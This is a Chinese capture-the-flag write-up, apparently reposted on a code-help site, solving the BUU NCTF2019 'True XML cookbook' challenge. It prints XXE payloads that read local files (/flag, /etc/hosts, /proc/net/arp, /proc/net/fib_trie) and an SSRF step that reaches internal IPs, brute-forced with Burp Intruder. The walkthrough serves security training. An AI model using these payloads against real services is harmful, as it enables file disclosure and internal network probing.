当前位置: 代码迷 >> 综合 >> BUU [NCTF2019]True XML cookbook
  详细解决方案

BUU [NCTF2019]True XML cookbook

热度:65   发布时间:2023-12-05 17:21:54.0

打开连接

 熟悉的界面,我们就不做黑盒测试了,直接抓包修改xml

payload:<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE note [<!ENTITY admin SYSTEM "file:///flag">]>
<user><username>&admin;</username><password>123456</password></user>

 测试直接读取flag失败,试试内网探测看是否有结果

内网探测命令

/etc/hosts
/proc/net/arp
/proc/net/tcp
/proc/net/udp
/proc/net/dev
/proc/net/fib_trie
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE note [<!ENTITY admin SYSTEM "file:///etc/hosts">]>
<user><username>&admin;</username><password>123456</password></user>

 

 并未发现任何主机,尝试其他命令

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE note [<!ENTITY admin SYSTEM "file:///proc/net/arp">]>
<user><username>&admin;</username><password>123456</password></user>

 这里扫出了两个主机,尝试访问

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE note [<!ENTITY admin SYSTEM "http://10.128.253.12 ">]>
<user><username>&admin;</username><password>123456</password></user>

 失败

用BP的intruder模块来爆破ip1-100

 add这里

 设置数字字典从1到100

 线程可以调高点

这里我把两个ip都爆破了一次,都没发现flag

尝试其他命令进行探测最后用此命令扫出了正确的ip

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE note [<!ENTITY admin SYSTEM "file:///proc/net/fib_trie">]>
<user><username>&admin;</username><password>123456</password></user>

 爆破得到flag

芜湖

  相关解决方案

代码迷 - 您身边的软件异常,代码异常,编程异常助手(发现,解决,分享)
Copyright © 2009-2013 DAIMAMI.COM. All rights reserved.